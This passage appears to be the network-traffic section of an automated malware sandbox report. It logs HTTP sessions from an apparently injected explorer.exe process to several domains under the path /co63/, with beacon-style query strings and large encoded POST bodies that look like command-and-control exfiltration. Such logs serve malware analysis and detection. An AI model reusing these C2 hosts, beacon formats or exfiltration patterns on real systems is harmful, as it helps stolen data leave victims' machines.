                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_R/ex/bZytcrn+mdS8YhV4IEoSKT9oNHNKUPqIjguyZiSsiUtRdiujE/fk+SgLzGG0HDyRB3Uyq6OtQGUGIBFfQ
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Jul 20, 2023 11:45:36.474831104 CEST | 641 | IN
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      11 | 192.168.2.5 | 49722 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:45:36.367321968 CEST | 498 | OUT | POST /co63/ HTTP/1.1
                                                      Host: www.dlafluid.com
                                                      Connection: close
                                                      Content-Length: 151296
                                                      Cache-Control: no-cache
                                                      Origin: http://www.dlafluid.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.dlafluid.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
0UgyatDJG2MnqfBEaf5Kywz(O~8BLkKtlpwh8jTlKc-(slprHXBOP~kxUMni8CDg9MWWklWMehLYAK6aMVBcZ~m0Fy70ZOHfh3gtfpqUAeLuUZ3Uv6fijYFTehSRlfbpE4XiWHIVZ5M2JVCATfItIcFm
                                                      Jul 20, 2023 11:45:36.382474899 CEST506OUTData Raw: 4e 41 5a 41 43 50 79 34 61 4e 4b 39 6b 41 6d 71 37 31 6b 53 49 4c 54 56 55 66 6b 4f 45 6d 69 7a 65 73 35 79 7e 52 35 62 67 6d 42 4e 6a 4e 42 76 6c 6c 67 72 37 6e 6f 4b 58 34 6c 4b 47 73 67 75 6e 34 33 33 69 51 72 35 6f 61 34 7a 74 6e 37 61 46 49
                                                      Data Ascii: NAZACPy4aNK9kAmq71kSILTVUfkOEmizes5y~R5bgmBNjNBvllgr7noKX4lKGsgun433iQr5oa4ztn7aFIbSDW49(Xxz1nHXQanSuRnVYXdwTrX7R2uZnqsUiRqb2b9qgMJpKVzZcXb3eQDZOHsvDURXt4tjOSdUQOO9Z2JUGWKYg1o0(WVdMc4DGQXDRctlJFi3HNIyryi-GN3S~beBrTEGCxyL9B7LDoHYYU3F5z6ALv~8i2t
                                                      Jul 20, 2023 11:45:36.382544041 CEST516OUTData Raw: 74 76 66 56 56 67 61 4a 66 34 41 6e 4f 46 38 35 37 31 33 49 66 48 32 75 69 55 51 4b 47 37 72 77 7a 4d 47 64 46 41 55 33 52 5f 69 7a 6d 6d 48 34 31 74 6b 72 38 67 73 70 32 4d 4e 6a 4a 53 74 30 52 35 31 4f 75 74 47 65 58 45 6b 56 47 77 31 66 6b 73
                                                      Data Ascii: tvfVVgaJf4AnOF85713IfH2uiUQKG7rwzMGdFAU3R_izmmH41tkr8gsp2MNjJSt0R51OutGeXEkVGw1fks(ApBJ8gOXK6bmJVPnapT53uf(zb3BqinFkwjglmtvot_fleSdwRBoMADNaXW69839tR93Tj4f6v0z-nUymVekjhIa-tOG6h_Ga2yeAU0W9w6MX4kIjuii0uhMwJDL3(C(1dCbfOe9oZtRCegFAUi4du0djRutgDIE
                                                      Jul 20, 2023 11:45:36.391192913 CEST524OUTData Raw: 56 79 69 79 64 56 6c 47 62 2d 56 4f 47 48 31 6a 68 34 7a 47 55 59 69 39 78 55 73 6b 78 74 71 36 44 70 4b 4b 30 62 75 42 44 32 69 39 58 79 30 68 34 58 74 4c 4b 6e 32 73 73 57 48 6a 77 70 31 51 70 4a 67 5f 6f 47 31 6a 36 48 75 37 73 6a 49 54 32 30
                                                      Data Ascii: VyiydVlGb-VOGH1jh4zGUYi9xUskxtq6DpKK0buBD2i9Xy0h4XtLKn2ssWHjwp1QpJg_oG1j6Hu7sjIT20X4rxJ_1YIeoBlDrEgDijpCMSXDo6cCNWPQN-K8Z8E6l_TLrfJ-(qx5TfAIXxVfGrbUJo7VQlTGBlS3Lp~hWrC0Lky9dhjFc2~mDSfvoAWcTlHhkGTCfAdlsWKoPOBoEOHIDIt7jhAIZf8Vb4Wkjmega22c51uiMww
                                                      Jul 20, 2023 11:45:36.406075954 CEST532OUTData Raw: 77 6f 31 64 74 57 47 57 4f 58 53 45 47 47 55 32 48 32 57 53 69 62 54 30 30 5f 48 33 28 41 67 36 48 36 72 62 48 42 6c 33 4d 57 78 4b 6f 53 57 4c 6a 65 46 42 7a 32 7e 76 70 53 30 38 48 6b 71 37 54 51 48 39 68 4f 6a 73 57 32 75 32 4f 71 48 6b 32 4f
                                                      Data Ascii: wo1dtWGWOXSEGGU2H2WSibT00_H3(Ag6H6rbHBl3MWxKoSWLjeFBz2~vpS08Hkq7TQH9hOjsW2u2OqHk2Ou85tCeO6HqzQqOYlxQRI27Q7pqjSOLZeTduw~xS8(QjM0HJ0wkfiZpxQDb1C051kmQV_GtV9grSUAlCQYHoEd0a9QRANFU9vyDDsQfoXj5jK~Qr_46qfKA0BQCkW3lT2GQhQSANbpM8SEFXpX9sM5W(qFyVQBygsh
                                                      Jul 20, 2023 11:45:36.406075954 CEST542OUTData Raw: 43 76 31 34 78 53 4d 47 51 68 54 5a 69 62 54 4c 37 4d 4c 68 51 42 28 2d 66 63 50 78 55 73 4f 58 77 58 37 6a 6e 48 32 6f 70 4d 68 75 54 61 66 74 4d 4e 30 4d 76 35 67 4b 37 31 79 57 33 76 6e 57 6c 71 74 6f 44 48 34 42 58 6e 4a 71 4e 4a 68 48 56 43
                                                      Data Ascii: Cv14xSMGQhTZibTL7MLhQB(-fcPxUsOXwX7jnH2opMhuTaftMN0Mv5gK71yW3vnWlqtoDH4BXnJqNJhHVCCQM1MEW3HuwO4nF0ZMLbtbYb9bAFmZNKwnncb-oKcXPPM2H2M4Cuz0uu4-DPQ3CNiJZfQ1MbNXskaurqLQU1otLS2aGa468zRnXaZsFzCV0_7J4gTBpADQWd0NeGGo(2WMA9hg(UcH~BLGGQVczvo59PmlB5o1BUm
                                                      Jul 20, 2023 11:45:36.406131983 CEST547OUTData Raw: 6a 51 37 44 48 4b 76 76 46 4b 34 59 37 74 6b 37 39 44 74 65 66 46 6c 46 28 79 7a 38 34 5f 45 47 66 5f 71 6b 28 63 48 55 44 62 54 6b 53 52 30 6d 38 39 70 49 76 5a 4f 57 63 4a 75 50 47 45 65 59 73 53 6d 69 37 76 6c 47 72 45 50 30 64 41 69 57 35 35
                                                      Data Ascii: jQ7DHKvvFK4Y7tk79DtefFlF(yz84_EGf_qk(cHUDbTkSR0m89pIvZOWcJuPGEeYsSmi7vlGrEP0dAiW55gbgUswCt7DXJ~Lfp207FVWCOtuLVXK9iSaPS5vpxmrSO8bT6zHe9p-ynAVeTkmtGe1OtsxRIFYRePt0yTz9CBFW9zuQN957oTthL~AkHsKc_88LGrjwTARty~p8RjsSRoEyF3DoowlRkyzPwc-kGdrpQ52b1JJ(rx
                                                      Jul 20, 2023 11:45:36.406168938 CEST557OUTData Raw: 6e 48 68 35 34 71 45 5f 56 2d 62 6d 53 6e 70 78 38 68 31 48 43 6d 48 70 30 32 43 2d 38 68 48 6a 37 46 62 56 35 6c 49 79 37 73 51 67 56 4a 34 2d 55 5f 6c 62 76 34 43 4e 43 57 6c 76 4b 72 6e 4f 35 45 30 2d 51 6a 4a 34 4b 5f 71 64 33 4a 43 6a 34 4d
                                                      Data Ascii: nHh54qE_V-bmSnpx8h1HCmHp02C-8hHj7FbV5lIy7sQgVJ4-U_lbv4CNCWlvKrnO5E0-QjJ4K_qd3JCj4Ma_ysuBXtZHOfwz3qPl0S4Bn_vwehhfc8tIdptbnKtAuzBO7Q(cMOOtud3LBneSo0vSevChk74mD0Rh5w0S8XflJ45j4F(esz(DbbzFvV8Bit1fvfsSM1pEWpP3ivaTk9fLB0NHGyV688ZLK4ntjqO5If1pCyWSAbc
                                                      Jul 20, 2023 11:45:36.406203032 CEST560OUTData Raw: 6c 64 35 45 7a 45 58 50 62 75 76 74 6c 71 73 68 4c 67 73 41 62 36 6e 36 4d 39 69 5a 33 64 69 74 70 66 5a 4d 4a 4a 6a 61 43 79 43 77 6c 75 32 71 4a 59 38 32 6c 74 6d 68 67 73 62 61 38 50 43 6f 39 4f 67 77 30 36 72 2d 61 4f 61 72 39 44 46 33 46 43
                                                      Data Ascii: ld5EzEXPbuvtlqshLgsAb6n6M9iZ3ditpfZMJJjaCyCwlu2qJY82ltmhgsba8PCo9Ogw06r-aOar9DF3FCi_5Sbp9ti_EZ2-L7zScPpg0qiyAO16b7jOhstY2SI8ymxbL6Cau8QLq1YTLz3wAnBKx4VBJ4Sux0bURrtQWGPHDivGQUJF9eMPpBhswQh3yA32K9FAvcsXhgpZqIr55t1qZsEKy_mgjYULgl4Nh7oPR9bHPwuK2fZ
                                                      Jul 20, 2023 11:45:36.414805889 CEST568OUTData Raw: 4e 45 47 6f 78 64 77 6a 48 38 43 68 6a 5a 74 6d 34 52 49 4c 7e 75 67 5a 41 6a 52 63 41 75 59 52 65 5f 41 76 32 50 52 35 68 5a 52 75 45 69 36 67 30 61 35 61 45 4d 37 65 62 73 41 58 58 78 30 49 45 35 33 61 30 77 72 6d 43 72 36 63 33 59 35 70 55 56
                                                      Data Ascii: NEGoxdwjH8ChjZtm4RIL~ugZAjRcAuYRe_Av2PR5hZRuEi6g0a5aEM7ebsAXXx0IE53a0wrmCr6c3Y5pUVldUIUpkUMdfGqKG30EWwTCU3wXvCOzndJeOVyQ(1NarGR8KTKozPQly59JRw6FsXeAW0A3SQJyvxz6QHBXDRlTlhsQ7-QCI1h4MzEz(Ml4ZTPZCs3uuiUyvaGBJqQxbsOirk7ut-VbELFrQ8DpVImA2XBlMPDGC9Q
                                                      Jul 20, 2023 11:45:36.414805889 CEST571OUTData Raw: 32 70 49 31 69 37 72 48 62 55 52 59 67 52 6f 4d 69 68 36 76 4f 57 58 56 4e 52 31 43 38 59 44 4f 6e 66 52 55 47 49 37 34 53 48 54 30 47 38 33 6e 37 39 57 4c 53 64 50 47 65 41 4c 4c 47 71 75 62 59 55 61 38 4b 63 59 73 46 55 34 39 73 73 54 50 78 63
                                                      Data Ascii: 2pI1i7rHbURYgRoMih6vOWXVNR1C8YDOnfRUGI74SHT0G83n79WLSdPGeALLGqubYUa8KcYsFU49ssTPxcVwCnNiKtVAXnel~0HBe9sxCaQyDRN4nR2k3RATn-9i~1HiutDteGdr2D(zO9FR2BMwyhw3D0rd6tkP5JTZjo(Lwx6_PjaYMJYppZoSViR6kAteO-~Az6iaQIx1~g(zuBaXlQHFcxHeWCaZJ3Pn95eTGc6bSerPFIW
                                                      Jul 20, 2023 11:45:36.496334076 CEST  642  IN  HTTP/1.1 405 Method Not Allowed
                                                      Server: openresty
                                                      Date: Thu, 20 Jul 2023 09:45:36 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 154
                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_R/ex/bZytcrn+mdS8YhV4IEoSKT9oNHNKUPqIjguyZiSsiUtRdiujE/fk+SgLzGG0HDyRB3Uyq6OtQGUGIBFfQ
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Jul 20, 2023 11:45:36.497956991 CEST  642  IN  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                      12          192.168.2.5  49723        76.223.26.96    80                C:\Windows\explorer.exe
                                                      Timestamp  kBytes transferred  Direction  Data
                                                      Jul 20, 2023 11:45:54.735474110 CEST  644  OUT  GET /co63/?aJElwV=McyR/z78/oMNrvlFuqxD/V8JfWPC4TTnrx7QyB/aq5OEZJfdbD3j+IdLq+ssY6HN52vi&lz=9rXXjDMXIb6HXH- HTTP/1.1
                                                      Host: www.myccsmartmove.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jul 20, 2023 11:45:54.776949883 CEST  644  IN  HTTP/1.1 403 Forbidden
                                                      Date: Thu, 20 Jul 2023 09:45:54 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 146
                                                      Connection: close
                                                      Server: nginx
                                                      Vary: Accept-Encoding
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                      13          192.168.2.5  49724        76.223.26.96    80                C:\Windows\explorer.exe
                                                      Timestamp  kBytes transferred  Direction  Data
                                                      Jul 20, 2023 11:45:56.827234030 CEST  648  OUT  POST /co63/ HTTP/1.1
                                                      Host: www.myccsmartmove.com
                                                      Connection: close
                                                      Content-Length: 1484
                                                      Cache-Control: no-cache
                                                      Origin: http://www.myccsmartmove.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.myccsmartmove.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                      14          192.168.2.5  49725        76.223.26.96    80                C:\Windows\explorer.exe
                                                      Timestamp  kBytes transferred  Direction  Data
                                                      Jul 20, 2023 11:45:56.851581097 CEST  661  OUT  POST /co63/ HTTP/1.1
                                                      Host: www.myccsmartmove.com
                                                      Connection: close
                                                      Content-Length: 151296
                                                      Cache-Control: no-cache
                                                      Origin: http://www.myccsmartmove.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.myccsmartmove.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Jul 20, 2023 11:45:56.872181892 CEST  687  IN  HTTP/1.1 403 Forbidden
                                                      Server: awselb/2.0
                                                      Date: Thu, 20 Jul 2023 09:45:56 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 138
                                                      Connection: close
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      15 | 192.168.2.5 | 49726 | 34.149.87.45 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:46:15.190228939 CEST | 689 | OUT | GET /co63/?aJElwV=C9mZAu2amj0/7xzN/ZGYFZ9Os9Pxtlf2WxsFucW+74+VhIoIvzmW589U18pQtRovant4&lz=9rXXjDMXIb6HXH- HTTP/1.1
                                                      Host: www.takealicense.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jul 20, 2023 11:46:15.334331036 CEST | 690 | IN | HTTP/1.1 301 Moved Permanently
                                                      Content-Length: 0
                                                      Location: https://www.takealicense.com/co63?aJElwV=C9mZAu2amj0%2F7xzN%2FZGYFZ9Os9Pxtlf2WxsFucW+74+VhIoIvzmW589U18pQtRovant4&lz=9rXXjDMXIb6HXH-
                                                      Strict-Transport-Security: max-age=3600
                                                      X-Wix-Request-Id: 1689846375.2233686788819076
                                                      Age: 0
                                                      Cache-Control: no-cache
                                                      X-Content-Type-Options: nosniff
                                                      Server: Pepyaka/1.19.10
                                                      Accept-Ranges: bytes
                                                      Date: Thu, 20 Jul 2023 09:46:15 GMT
                                                      X-Served-By: cache-mxp6953-MXP
                                                      X-Cache: MISS
                                                      Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_g
                                                      X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NQ1aV/eYQaI5OrqNssi0Z4KvxIl911PKpWsWOzhPjUu/,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=,2d58ifebGbosy5xc+FRaludK2hR3yyHRGDqmxp12QQGKRfFxBID23ME7gOg8AhstxmHv8JmZfQswK4rISLAEpJCJmM3SSAV5HC2c0/ptei4=,2UNV7KOq4oGjA5+PKsX47BDjqNAtrQVFnWu10nx+t+5Wd3xniMsr1HjrszKGvMzr,mNw+yUiq+NSO91VuAKqIn9zgM16/Po/iDX/JwI41ttI=,gSyhVvYt+ZPrXQZcQ10/tZmiz1SOiqsTU3GJmm8Uddc=,pZ8pmqn5qCKnXNQy8ErmK8D5fqmuDbtVbdaoXaNsFfMwnSjqhzzjcR4wo3vcZUw3nCdhy80+Ru8fd2AXHio5HQ==
                                                      Via: 1.1 google
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      16 | 192.168.2.5 | 49727 | 34.149.87.45 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:46:17.363862038 CEST | 692 | OUT | POST /co63/ HTTP/1.1
                                                      Host: www.takealicense.com
                                                      Connection: close
                                                      Content-Length: 1484
                                                      Cache-Control: no-cache
                                                      Origin: http://www.takealicense.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.takealicense.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Jul 20, 2023 11:46:17.435934067 CEST | 732 | IN | HTTP/1.1 403 Forbidden
                                                      Content-Length: 146
                                                      Content-Type: text/html
                                                      X-Wix-Request-Id: 1689846377.39596200702118928
                                                      X-Content-Type-Options: nosniff
                                                      Server: Pepyaka/1.19.10
                                                      Accept-Ranges: bytes
                                                      Date: Thu, 20 Jul 2023 09:46:17 GMT
                                                      X-Served-By: cache-mxp6968-MXP
                                                      X-Cache: MISS
                                                      X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NYMupe6WQf6MVMrzEUOojIKTPIdeTaQ6JwDV79BjSUA+,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      17 | 192.168.2.5 | 49728 | 34.149.87.45 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:46:17.390978098 CEST | 705 | OUT | POST /co63/ HTTP/1.1
                                                      Host: www.takealicense.com
                                                      Connection: close
                                                      Content-Length: 151296
                                                      Cache-Control: no-cache
                                                      Origin: http://www.takealicense.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.takealicense.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Jul 20, 2023 11:46:17.509630919 CEST | 850 | IN | HTTP/1.1 403 Forbidden
                                                      Content-Length: 146
                                                      Content-Type: text/html
                                                      X-Wix-Request-Id: 1689846377.47140507045121470
                                                      X-Content-Type-Options: nosniff
                                                      Server: Pepyaka/1.19.10
                                                      Accept-Ranges: bytes
                                                      Date: Thu, 20 Jul 2023 09:46:17 GMT
                                                      X-Served-By: cache-mxp6957-MXP
                                                      X-Cache: MISS
                                                      X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NYMupe6WQf6MVMrzEUOojIJqzH7v57uBf+JE84tfrPJH,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      18 | 192.168.2.5 | 49729 | 184.94.215.140 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:46:39.806387901 CEST | 852 | OUT | POST /co63/ HTTP/1.1
                                                      Host: www.naspewt.xyz
                                                      Connection: close
                                                      Content-Length: 1484
                                                      Cache-Control: no-cache
                                                      Origin: http://www.naspewt.xyz
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.naspewt.xyz/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Jul 20, 2023 11:46:40.046875954 CEST | 853 | IN | HTTP/1.1 404 Not Found
                                                      Date: Thu, 20 Jul 2023 09:46:39 GMT
                                                      Server: Apache/2.4.29 (Ubuntu)
                                                      Content-Length: 277
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.naspewt.xyz Port 80</address></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      19 | 192.168.2.5 | 49730 | 184.94.215.140 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:46:40.497159958 CEST | 866 | OUT | POST /co63/ HTTP/1.1
                                                      Host: www.naspewt.xyz
                                                      Connection: close
                                                      Content-Length: 151296
                                                      Cache-Control: no-cache
                                                      Origin: http://www.naspewt.xyz
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.naspewt.xyz/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Jul 20, 2023 11:46:41.290138006 CEST | 1004 | IN | HTTP/1.1 404 Not Found
                                                      Date: Thu, 20 Jul 2023 09:46:40 GMT
                                                      Server: Apache/2.4.29 (Ubuntu)
                                                      Content-Length: 277
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.naspewt.xyz Port 80</address></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      2 | 192.168.2.5 | 49713 | 86.38.202.187 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:44:40.459691048 CEST | 138 | OUT | POST /co63/ HTTP/1.1
                                                      Host: www.vestostore.com
                                                      Connection: close
                                                      Content-Length: 151296
                                                      Cache-Control: no-cache
                                                      Origin: http://www.vestostore.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.vestostore.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
k~X~1wAIvquWGE6sMOWsbe-DmgVKjA2x5eSXzxAoaVLVVb6qKfZpb0vRvuKu1KdENa3wf78RO3KzKxPxy(y8fi53toKh1a8JPQgyWVQkPuaf6HFGAQRFEkrOARZIDgF0fnnXfzNZ1vIhKy8zdvKfXZj(
                                                      Jul 20, 2023 11:44:40.622956038 CEST161OUTData Raw: 64 33 4a 5f 36 4f 58 52 53 62 39 4d 6c 39 57 77 5a 32 71 62 46 6c 4c 4d 49 33 34 68 7a 42 55 4e 57 57 50 39 35 71 68 6f 6b 42 6a 4a 58 63 70 59 28 50 49 6f 39 42 70 74 37 2d 79 57 50 42 5a 67 46 4c 6f 44 4a 31 68 38 35 79 47 67 51 39 71 6b 67 70
                                                      Data Ascii: d3J_6OXRSb9Ml9WwZ2qbFlLMI34hzBUNWWP95qhokBjJXcpY(PIo9Bpt7-yWPBZgFLoDJ1h85yGgQ9qkgpo8uSBBgPE5Ff4n28tseXnfMtFqOa(OFjEQ0CTmd3IxAIVZ9cafNjS-40MVR7ShksPwlN(M9audEk7VWZOWdgS8heCkc6squMd0GE(65O6u5NF_i2RjmReKI8fGyZdBQAPbHAxI5EW9(0mgKmELMNCRCMaPVw97gTN
                                                      Jul 20, 2023 11:44:40.622970104 CEST | 162 | IN | HTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      content-type: text/html
                                                      content-length: 707
                                                      date: Thu, 20 Jul 2023 09:44:40 GMT
                                                      server: LiteSpeed
                                                      location: https://www.vestostore.com/co63/
                                                      platform: hostinger
                                                      content-security-policy: upgrade-insecure-requests
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      20 | 192.168.2.5 | 49731 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Jul 20, 2023 11:46:57.367342949 CEST | 1005 | OUT | GET /co63/?aJElwV=3AiLeGuBi37RfNw9iEe1gED9S58L9D44LalDhi66HjPelwFncooMVS2PHplI6kLySndc&lz=9rXXjDMXIb6HXH- HTTP/1.1
                                                      Host: www.mattewigs.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jul 20, 2023 11:46:57.400480032 CEST | 1007 | IN | HTTP/1.1 403 Forbidden
                                                      Date: Thu, 20 Jul 2023 09:46:57 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      X-Sorting-Hat-PodId: 275
                                                      X-Sorting-Hat-ShopId: 78317551892
                                                      X-Dc: gcp-europe-west3
                                                      X-Request-ID: 619dc533-3df6-40c6-b74c-29637f03265a
                                                      X-XSS-Protection: 1; mode=block
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-Permitted-Cross-Domain-Policies: none
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uH5aeEqN3obfucUZWJZxP2rtEyDNUaJ7saLEC0Ok2Owj7W8d0caYEwTGPeiRIgUoDaiIZVk18uwtzJEIZrBRt9cJ6bNakCkFfGOUXGLV8mIisdbuuED8woLaz1OTyooLO3L8"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                      Server-Timing: cfRequestDuration;dur=14.999866
                                                      Server: cloudflare
                                                      CF-RAY: 7e9a47ac8dbc9295-FRA
                                                      alt-svc: h3=":443"; ma=86400
